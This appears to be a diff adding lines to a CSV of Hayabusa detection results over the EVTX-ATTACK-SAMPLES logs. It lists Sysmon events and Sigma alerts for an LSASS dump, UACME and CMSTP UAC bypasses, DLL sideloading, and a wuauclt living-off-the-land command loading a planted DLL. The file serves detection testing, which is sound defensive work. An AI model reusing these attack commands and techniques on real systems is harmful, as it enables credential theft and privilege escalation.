+2020-09-28 21:47:36.206 +09:00,DESKTOP-PIU87N6,8,medium,,Process Injection,Src Process: C:\Windows\System32\rdrleakdiag.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 3352 | Src PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01 | Tgt PID: 668 | Tgt PGUID: BC47D85C-FAA9-5F68-0000-0010D9590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,Cmd: C:\WINDOWS\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\lsass.exe | LID: 0x3e7 | PID: 7468 | PGUID: BC47D85C-DB68-5F71-0000-00109138AB01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,CredAccess,Suspicious LSASS Process Clone,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.630 +09:00,DESKTOP-PIU87N6,11,info,,File Created,Path: C:\Users\wanwan\Desktop\minidump_668.dmp | Process: C:\WINDOWS\system32\rdrleakdiag.exe | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: POC.exe | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x5a873 | PID: 4696 | PGUID: 747F3D96-2156-5F76-0000-0010DBE82500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: Program | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: POC.exe | LID: 0x5a873 | PID: 5448 | PGUID: 747F3D96-2156-5F76-0000-00100EEC2500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.775 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\abc.txt | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 6932 | PGUID: 747F3D96-1903-5F76-0000-0010B85E0900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\mmc.exe"" WF.msc | LID: 0x391e334 | PID: 12876 | PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Windows\System32\mmc.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 20228 | Src PGUID: 00247C92-9E03-5F7B-0000-0010A645272C | Tgt PID: 12876 | Tgt PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,../hayabusa-rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
+2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,../hayabusa-rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
+2020-10-07 07:11:17.572 +09:00,02694w-win10.threebeesco.com,18,info,,Pipe Connected,\winreg | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,Exec | Persis,DLL Load via LSASS,,../hayabusa-rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,Exec | Persis,DLL Load via LSASS,,../hayabusa-rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64037 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.143:49920 (02694w-win10.threebeesco.com) | Dst: 172.16.66.36:49670 (01566S-WIN16-IR) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\lsass.exe | PID: 632 | PGUID: 6A3C3EF2-E698-5F7C-0000-00103C790000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:18.930 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64038 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 6372 | PGUID: 00247C92-09FE-5F86-0000-0010AC861401,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
+2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 7648 | PGUID: 00247C92-09FE-5F86-0000-0010AD861401,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
+2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\smartscreen.exe -Embedding | Process: C:\Windows\System32\smartscreen.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8d824 | PID: 2656 | PGUID: 747F3D96-4BCE-5F88-0000-00103F464D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,Persis,New RUN Key Pointing to Suspicious Folder,,../hayabusa-rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\tendyron.exe"" | LID: 0x8d824 | PID: 6392 | PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.738 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.764 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.765 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xa0a10 | PID: 3660 | PGUID: 747F3D96-D8DF-5F8A-0000-0010572F7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0xa09d1 | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:33.449 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\wwlib.dll | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | LID: 0xa09d1 | PID: 2920 | PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
